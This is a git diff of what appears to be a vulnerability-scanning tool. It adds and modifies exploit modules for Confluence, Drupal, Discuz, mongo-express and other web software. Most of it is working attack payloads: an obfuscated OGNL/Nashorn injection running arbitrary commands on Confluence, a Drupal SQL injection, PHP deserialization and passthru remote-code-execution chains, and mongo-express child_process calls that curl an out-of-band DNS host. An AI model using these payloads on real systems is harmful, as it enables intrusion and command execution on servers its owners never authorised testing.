--- a/lib/tool/logger.py
+++ b/lib/tool/logger.py
@@ -1,11 +1,11 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-from stringprep import in_table_c3
from lib.initial.config import config
from lib.tool.timed import nowtime
from lib.tool import color
from thirdparty.tqdm import tqdm
+import http.client
class Logger():
def __init__(self):
@@ -62,7 +62,7 @@ def logging_4(self, vul_info, status_code, res):
info_4 = self.logging_2(vul_info, status_code)
try:
info_4 += color.red_ex(' [Request')
- info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + 'HTTP/1.1')
+ info_4 += color.black_ex('\n' + res.request.method + ' ' + res.request.path_url + ' ' + http.client.HTTPConnection._http_vsn_str)
info_4 += color.black_ex('\n' + 'Host' + ': ' + self.get_domain(res.request.url))
for key, value in res.request.headers.items():
@@ -71,6 +71,7 @@ def logging_4(self, vul_info, status_code, res):
info_4 += color.black_ex('\n\n' + res.request.body)
info_4 += color.red_ex('\n]')
+ info_4 += color.reset('')
except:
return info_4
return info_4
diff --git a/payloads/AlibabaNacos.py b/payloads/AlibabaNacos.py
index fb4d6f5..ce1f367 100644
--- a/payloads/AlibabaNacos.py
+++ b/payloads/AlibabaNacos.py
@@ -104,12 +104,11 @@ def cve_2021_29441_scan(self, url):
'Payload-See User List': {
'Method': 'GET',
'Path': path,
- 'Headers': headers
},
+ 'Request': res,
'Payload-Add User': {
'Method': 'POST',
- 'Path': 'nacos/v1/auth/users?username=mouse&password=mouse',
- 'Headers': headers
+ 'Path': 'nacos/v1/auth/users?username=mouse&password=mouse'
}
}
return results
diff --git a/payloads/ApacheAPISIX.py b/payloads/ApacheAPISIX.py
index 4933b2e..d388b03 100644
--- a/payloads/ApacheAPISIX.py
+++ b/payloads/ApacheAPISIX.py
@@ -103,12 +103,16 @@ def cve_2020_13945_scan(self, url):
results = {
'Verify': url + 'mouse',
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
+ 'Payload-1': {
+ 'Method': vul_info['vul_method'],
'Url': url,
'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
+ 'Headers': vul_info['headers'],
+ },
+ 'Request-1': res1,
+ 'Payload-2': {
+ 'Method': 'GET',
+ 'Path': '/mouse'
}
}
return results
diff --git a/payloads/ApacheFlink.py b/payloads/ApacheFlink.py
index a802afb..db6f4b7 100644
--- a/payloads/ApacheFlink.py
+++ b/payloads/ApacheFlink.py
@@ -83,8 +83,8 @@ def cve_2020_17519_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
'Payload': {
+ 'Method': vul_info['vul_method'],
'Url': url,
'Path': path
}
diff --git a/payloads/ApacheSolr.py b/payloads/ApacheSolr.py
index 33a4e76..e6d4fdf 100644
--- a/payloads/ApacheSolr.py
+++ b/payloads/ApacheSolr.py
@@ -148,12 +148,7 @@ def cve_2021_27905_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/ApacheTomcat.py b/payloads/ApacheTomcat.py
index 7a7490e..85851b9 100644
--- a/payloads/ApacheTomcat.py
+++ b/payloads/ApacheTomcat.py
@@ -90,12 +90,7 @@ def cve_2017_12615_scan(self, url):
'Target': url,
'Verify': verify_url,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/AtlassianConfluence.py b/payloads/AtlassianConfluence.py
index 8aab551..d232180 100644
--- a/payloads/AtlassianConfluence.py
+++ b/payloads/AtlassianConfluence.py
@@ -17,13 +17,15 @@
4. Confluence远程代码执行
CVE-2022-26134
- Payload: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+ Payload-1: https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2022-26134
+ Payload-2: https://github.com/SNCKER/CVE-2022-26134
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
file:///C:/Windows/System32/drivers/etc/hosts
'''
+import base64
from lib.api.dns import dns
from lib.initial.config import config
from lib.tool.md5 import md5, random_md5
@@ -135,6 +137,11 @@ def __init__(self):
'path': '%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22echo%20{}%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/'.format(self.md),
'data': '',
'headers': head.merge(self.headers, {})
+ },
+ {
+ 'path': '%24%7BClass.forName%28%22com.opensymphony.webwork.ServletActionContext%22%29.getMethod%28%22getResponse%22%2Cnull%29.invoke%28null%2Cnull%29.setHeader%28%22X-Confluence%22%2CClass.forName%28%22javax.script.ScriptEngineManager%22%29.newInstance%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22eval%28String.fromCharCode%28118%2C97%2C114%2C32%2C114%2C101%2C113%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C99%2C111%2C109%2C46%2C111%2C112%2C101%2C110%2C115%2C121%2C109%2C112%2C104%2C111%2C110%2C121%2C46%2C119%2C101%2C98%2C119%2C111%2C114%2C107%2C46%2C83%2C101%2C114%2C118%2C108%2C101%2C116%2C65%2C99%2C116%2C105%2C111%2C110%2C67%2C111%2C110%2C116%2C101%2C120%2C116%2C46%2C103%2C101%2C116%2C82%2C101%2C113%2C117%2C101%2C115%2C116%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C99%2C109%2C100%2C61%2C114%2C101%2C113%2C46%2C103%2C101%2C116%2C80%2C97%2C114%2C97%2C109%2C101%2C116%2C101%2C114%2C40%2C34%2C115%2C101%2C97%2C114%2C99%2C104%2C34%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C108%2C97%2C110%2C103%2C46%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C103%2C101%2C116%2C82%2C117%2C110%2C116%2C105%2C109%2C101%2C40%2C41%2C59%2C13%2C10%2C118%2C97%2C114%2C32%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C61%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C66%2C97%2C115%2C101%2C54%2C52%2C46%2C103%2C101%2C116%2C69%2C110%2C99%2C111%2C100%2C101%2C114%2C40%2C41%2C59%2C13%2C10%2C101%2C110%2C99%2C111%2C100%2C101%2C114%2C46%2C101%2C110%2C99%2C111%2C100%2C101%2C84%2C111%2C83%2C116%2C114%2C105%2C110%2C103%2C40%2C110%2C101%2C119%2C32%2C80%2C97%2C99%2C107%2C97%2C103%2C101%2C115%2C46%2C106%2C97%2C118%2C97%2C46%2C117%2C116%2C105%2C108%2C46%2C83%2C99%2C97%2C110%2C110%2C101%2C114%2C40%2C114%2C117%2C110%2C116%2C105%2C109%2C101%2C46%2C101%2C120%2C101%2C99%2C40%2C99%2C109%2C100%2C41%2C46%2C103%2C101%2C116%2C73%2C110%2C112%2C117%2C116%2C83%2C116%2C114%2C101%2C97%2C109%2C40%2C41%2C41%2C46%2C117%2C115%2C101%2C68%2C101%2C108%2C105%2C109%2C105%2C116%2C101%2C114%2C40%2C34%2C92%2C92%2C65%2C34%2C41%2C46%2C110%2C101%2C120%2C116%2C40%2C41%2C46%2C103%2C101%2C116%2C66%2C121%2C116%2C101%2C115%2C40%2C41%2C41%29%29%22%29%29%7D/?search='+ self.cmd,
+ 'data': '',
+ 'headers': head.merge(self.headers, {})
}
]
@@ -191,12 +198,7 @@ def cve_2019_3396_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
@@ -251,12 +253,7 @@ def cve_2021_26084_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': headers
- }
+ 'Payload': res
}
return results
@@ -313,10 +310,7 @@ def cve_2015_8399_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
+ 'Payload': res
}
return results
@@ -363,15 +357,24 @@ def cve_2022_26134_scan(self, url):
return None
res_md = "'X-Cmd-Response': '" + self.md
- if (res_md in check.check_res(str(res.headers), res_md)):
+ res_md_2 = "'X-Confluence: '" + self.md
+
+ if (self.md in check.check_res(res.headers.get('X-Cmd-Response', ''), self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+ elif (self.md in check.check_res(base64.b64decode(res.headers.get('X-Confluence', '')).decode(), self.md)):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path
- }
+ 'Response-Headers': 'X-Confluence: XXX',
+ 'Response-Decode': 'Base64',
+ 'Payload': res
}
return results
diff --git a/payloads/Cisco.py b/payloads/Cisco.py
index cfb73ba..beb3388 100644
--- a/payloads/Cisco.py
+++ b/payloads/Cisco.py
@@ -77,12 +77,7 @@ def cve_2020_3580_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Discuz.py b/payloads/Discuz.py
new file mode 100644
index 0000000..10d1e0d
--- /dev/null
+++ b/payloads/Discuz.py
@@ -0,0 +1,122 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+Discuz!论坛(BBS)是一个采用PHP和MySQL等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台: https://discuz.dismall.com
+ Discuz扫描类:
+ 1. Discuz 全局变量防御绕过导致代码执行
+ wooyun-2010-080723
+ Payload: https://vulhub.org/#/environments/discuz/wooyun-2010-080723/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class Discuz(): # todo 1: 类名(例如 ThinkPHP)
+ ''' 标有数字的地方都需要自己填写 '''
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'Discuz' # todo 2: 漏洞框架/应用程序/CMS等(例如 thinkphp)
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.wooyun_2010_080723_payloads = [ # todo 3: Payload的名称(例如 cnvd_2018_24942_payloads)
+ {
+ 'path': 'viewthread.php?tid=10&extra=page%3D1', # todo 4: url路径(例如/admin/login)
+ 'data': '', # todo 5: POST数据, 没有的话可以不写
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ # todo 6: Headers请求头, 填在{}里面, 字典形式; 没有的话可以不写, 不写的话将使用默认请求头; 如果存在同名的请求头, 则会覆盖掉原来的
+ },
+ {
+ 'path': '?tid=10&extra=page%3D1',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ },
+ {
+ 'path': '',
+ 'data': '',
+ 'headers': head.merge(self.headers, {
+ 'Cookie': 'GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();'
+ })
+ },
+ ]
+
+ def wooyun_2010_080723_scan(self, url): # todo 7: POC的名称(例如 cnvd_2018_24942_scan)
+ '''
+ 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,
+ 导致$_REQUEST中不再包含$_COOKIE,
+ 我们通过在Cookie中传入$GLOBALS来覆盖全局变量, 可以造成代码执行漏洞。
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE' # todo 8: 漏洞类型(例如 RCE)
+ vul_info['vul_id'] = 'wooyun-2010-080723' # todo 9: 漏洞编号(例如 CNVD-2018-24942)
+ vul_info['vul_method'] = 'GET' # todo 10: 请求方式(例如 GET)
+
+ for payload in self.wooyun_2010_080723_payloads: # todo 3: 同上, Payload的名称
+ path = payload['path']
+ data = payload['data']
+ headers = payload['headers']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['headers'] = headers
+ vul_info['target'] = target
+
+ try:
+ res = requests.get( # todo 11: 请求方式(例如 get)
+ target,
+ timeout=self.timeout,
+ headers=headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('PHP Version' in res.text) and ('PHP License' in res.text)): # todo 12: 判断扫描结果
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload': res
+ }
+ return results
+
+ def addscan(self, url, vuln=None):
+ if vuln:
+ return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
+
+ return [
+ thread(target=self.wooyun_2010_080723_scan, url=url) # todo 6: 同上, POC的名称
+ ]
+
+discuz = Discuz() # todo 1: 同上, 类名
diff --git a/payloads/Drupal.py b/payloads/Drupal.py
index 650c21a..fa0d76b 100644
--- a/payloads/Drupal.py
+++ b/payloads/Drupal.py
@@ -8,6 +8,18 @@
CVE-2018-7600
Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7600/
+ 2. Drupal < 7.32 Drupalgeddon SQL 注入
+ CVE-2014-3704
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2014-3704/
+
+ 3. Drupal Core 8 PECL YAML 反序列化任意代码执行
+ CVE-2017-6920
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2017-6920/
+
+ 4. Drupal 远程代码执行
+ CVE-2018-7602
+ Payload: https://vulhub.org/#/environments/drupal/CVE-2018-7602/
+
file:///etc/passwd
file:///C:\Windows\System32\drivers\etc\hosts
'''
@@ -18,8 +30,10 @@
from lib.tool.logger import logger
from lib.tool.thread import thread
from lib.tool import check
+from lib.tool import color
from thirdparty import requests
from time import sleep
+import re
class Drupal():
def __init__(self):
@@ -38,6 +52,39 @@ def __init__(self):
},
]
+ self.cve_2014_3704_payloads = [
+ {
+ 'path': '?q=node&destination=node',
+ 'data': 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
+ }
+ ]
+
+ self.cve_2017_6920_payloads = [
+ {
+ 'path': 'admin/config/development/configuration/single/import',
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ },
+ {
+ 'path': 'config/development/configuration/single/import',
+ 'data': 'config_type=system.simple&config_name=mouse&import=%21php%2Fobject+%22O%3A24%3A%5C%22GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C%22%3A2%3A%7Bs%3A33%3A%5C%22%5C0GuzzleHttp%5C%5CPsr7%5C%5CFnStream%5C0methods%5C%22%3Ba%3A1%3A%7Bs%3A5%3A%5C%22close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7Ds%3A9%3A%5C%22_fn_close%5C%22%3Bs%3A7%3A%5C%22phpinfo%5C%22%3B%7D%22&custom_entity_id=&form_build_id=form-oV9l14-rh1C9ZZYxXBTrcqCX7Gg3ouuBA29sie-ghCs&form_token=HxdRhcKEhWWljaPOlYKS8WQvHNRaW3UyJWPGWmPwuKI&form_id=config_single_import_form&op=Import'
+ }
+ ]
+
+ self.cve_2018_7602_payloads = [
+ {
+ 'path': '?q=%2Fuser%2F1%2Fcancel',
+ 'data': ''
+ },
+ {
+ 'path': '?q=%2Fuser%2F1%2Fcancel&destination=%2Fuser%2F1%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3D' + self.cmd,
+ 'data': 'form_id=user_cancel_confirm_form&form_token={}&_triggering_element_name=form_id&op=Cancel+account'
+ },
+ {
+ 'path': '?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F',
+ 'data': 'form_build_id='
+ },
+ ]
+
def cve_2018_7600_scan(self, url):
''' '''
vul_info = {}
@@ -85,10 +132,220 @@ def cve_2018_7600_scan(self, url):
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
'Method': vul_info['vul_method'],
- 'Payload': {
+ 'Payload': res
+ }
+ return results
+
+ def cve_2014_3704_scan(self, url):
+ ''' 7.32之前的Drupal core 7.x中的数据库抽象API中的expandArguments函数,
+ 无法正确构造准备好的语句, 这使得远程攻击者可以通过包含精心制作的密钥的数组进行SQL注入攻击
+ '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'SQLinject'
+ vul_info['vul_id'] = 'CVE-2014-3704'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2014_3704_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('DatabaseConnection->escapeLike()' in res.text) and ('XPATH syntax error' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2017_6920_scan(self, url):
+ ''' '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'unSerialize'
+ vul_info['vul_id'] = 'CVE-2017-6920'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in self.cve_2017_6920_payloads:
+ path = payload['path']
+ data = payload['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (('PHP Version' in res.text) and ('PHP License' in res.text)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Method': vul_info['vul_method'],
+ 'Payload': res
+ }
+ return results
+
+ def cve_2018_7602_scan(self, url):
+ ''' 对URL中的#进行编码两次, 即可绕过sanitize()函数的过滤 '''
+ vul_info = {}
+ vul_info['app_name'] = self.app_name
+ vul_info['vul_type'] = 'RCE'
+ vul_info['vul_id'] = 'CVE-2018-7602'
+ vul_info['vul_method'] = 'POST'
+ vul_info['headers'] = {}
+
+ # headers = self.headers.copy()
+ # headers.update(vul_info['headers'])
+
+ for payload in range(len(self.cve_2018_7602_payloads)):
+ path = self.cve_2018_7602_payloads[payload]['path']
+ data = self.cve_2018_7602_payloads[payload]['data']
+ target = url + path
+
+ vul_info['path'] = path
+ vul_info['data'] = data
+ vul_info['target'] = target
+
+ try:
+ if payload == 0: # * 当payload为第1个时, 获取form_token
+ res = requests.get(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ form_token = re.search(r'name="form_token" value=".{43}', res.text, re.I|re.M|re.U|re.S)
+ if (form_token):
+ self.form_token = form_token.group().replace('name="form_token" value="', '')
+ else:
+ return None
+
+ elif payload == 1: # * 当payload为第2个时, 注入命令
+ data = data.format(self.form_token) # * 添加form_token
+
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ form_build_id = re.search(r'name="form_build_id" value="form-.{43}', res.text, re.I|re.M|re.U|re.S)
+ if (form_build_id):
+ self.form_build_id = form_build_id.group().replace('name="form_build_id" value="', '')
+ else:
+ return None
+
+ elif payload == 2: # * 当payload为第3个时, 查看回显
+ target += self.form_build_id # * 添加form_build_id
+ data += self.form_build_id
+
+ res = requests.post(
+ target,
+ timeout=self.timeout,
+ headers=self.headers,
+ data=data,
+ proxies=self.proxies,
+ verify=False,
+ allow_redirects=False
+ )
+ logger.logging(vul_info, res.status_code, res) # * LOG
+
+ except requests.ConnectTimeout:
+ logger.logging(vul_info, 'Timeout')
+ return None
+ except requests.ConnectionError:
+ logger.logging(vul_info, 'Faild')
+ return None
+ except:
+ logger.logging(vul_info, 'Error')
+ return None
+
+ if (self.md in check.check_res(res.text, self.md)):
+ results = {
+ 'Target': target,
+ 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
+ 'Payload-1': {
+ 'Method': 'GET',
+ 'Url': url,
+ 'Path': self.cve_2018_7602_payloads[0]['path']
+ },
+ 'Payload-2': {
+ 'Method': 'POST',
+ 'Url': url,
+ 'Path': self.cve_2018_7602_payloads[1]['path'],
+ 'Data': self.cve_2018_7602_payloads[1]['data'].format(self.form_token),
+ 'form_token': self.form_token
+ },
+ 'Payload-3': {
+ 'Method': 'POST',
'Url': url,
'Path': path,
- 'Data': data
+ 'Data': data,
+ 'form_build_id': self.form_build_id
}
}
return results
@@ -98,7 +355,10 @@ def addscan(self, url, vuln=None):
return eval('thread(target=self.{}_scan, url="{}")'.format(vuln, url))
return [
- thread(target=self.cve_2018_7600_scan, url=url)
+ thread(target=self.cve_2018_7600_scan, url=url),
+ thread(target=self.cve_2014_3704_scan, url=url),
+ thread(target=self.cve_2017_6920_scan, url=url),
+ thread(target=self.cve_2018_7602_scan, url=url)
]
drupal = Drupal()
diff --git a/payloads/ElasticSearch.py b/payloads/ElasticSearch.py
index 30b0e27..fe6ff92 100644
--- a/payloads/ElasticSearch.py
+++ b/payloads/ElasticSearch.py
@@ -159,12 +159,7 @@ def cve_2014_3120_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -215,12 +210,7 @@ def cve_2015_1427_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data
- }
+ 'Payload': res
}
return results
@@ -353,7 +343,8 @@ def cve_2015_5531_scan(self, url):
'Payload': {
'Url': url,
'Path': path,
- 'Prompt': 'ASCII decimal encode'
+ 'Decode': 'ASCII decimal encode',
+ 'Decode-Url': 'https://www.qqxiuzi.cn/bianma/ascii.htm'
}
}
return results
diff --git a/payloads/F5BIGIP.py b/payloads/F5BIGIP.py
index 6fa323e..a720d90 100644
--- a/payloads/F5BIGIP.py
+++ b/payloads/F5BIGIP.py
@@ -198,13 +198,7 @@ def cve_2022_1388_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Path': path,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Fastjson.py b/payloads/Fastjson.py
index 1d30408..580dd6a 100644
--- a/payloads/Fastjson.py
+++ b/payloads/Fastjson.py
@@ -115,12 +115,7 @@ def cnvd_2019_22238_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
@@ -177,12 +172,7 @@ def cnvd_2017_02833_scan(self, url):
results = {
'Target': target,
'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']],
- 'Method': vul_info['vul_method'],
- 'Payload': {
- 'Url': url,
- 'Data': data,
- 'Headers': vul_info['headers']
- }
+ 'Payload': res
}
return results
diff --git a/payloads/Kindeditor.py b/payloads/Kindeditor.py
index f40619f..c6b19fc 100644
--- a/payloads/Kindeditor.py
+++ b/payloads/Kindeditor.py
@@ -1,7 +1,7 @@
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
-''' 还没测试POC准确性, 默认不启用
+''' 还没写好
KindEditor是一套开源的HTML可视化编辑器
Kindeditor扫描类:
Kindeditor 目录遍历
diff --git a/payloads/MongoExpress.py b/payloads/MongoExpress.py
new file mode 100644
index 0000000..7ba8083
--- /dev/null
+++ b/payloads/MongoExpress.py
@@ -0,0 +1,127 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+mongo-express是一款mongodb的第三方Web界面, 使用node和express开发
+ Mongo-Express扫描类:
+ mongo-express 未授权远程代码执行
+ CVE-2019-10758
+ Payload: https://vulhub.org/#/environments/mongo-express/CVE-2019-10758/
+
+file:///etc/passwd
+file:///C:\Windows\System32\drivers\etc\hosts
+'''
+
+from lib.api.dns import dns
+from lib.initial.config import config
+from lib.tool.md5 import md5, random_md5
+from lib.tool.logger import logger
+from lib.tool.thread import thread
+from lib.tool import check
+from lib.tool import head
+from thirdparty import requests
+from time import sleep
+
+class MongoExpress():
+ def __init__(self):
+ self.timeout = config.get('timeout')
+ self.headers = config.get('headers')
+ self.proxies = config.get('proxies')
+
+ self.app_name = 'mongo-express'
+ self.md = md5(self.app_name)
+ self.cmd = 'echo ' + self.md
+
+ self.cve_2019_10758_payloads = [
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSdomain")',
+ 'headers': head.merge(self.headers, {
+ 'Authorization': 'Basic YWRtaW46cGFzcw=='
+ })
+
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSdomain")',
+ 'headers': head.merge(self.headers, {
+ 'Authorization': 'Basic YWRtaW46cGFzcw=='
+ })
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl DNSdomain")',
+ 'headers': head.merge(self.headers, {})
+
+ },
+ {
+ 'path': 'checkValid',
+ 'data': 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("ping DNSdomain")',
+ 'headers': head.merge(self.headers, {})
+ }
+ ]
+
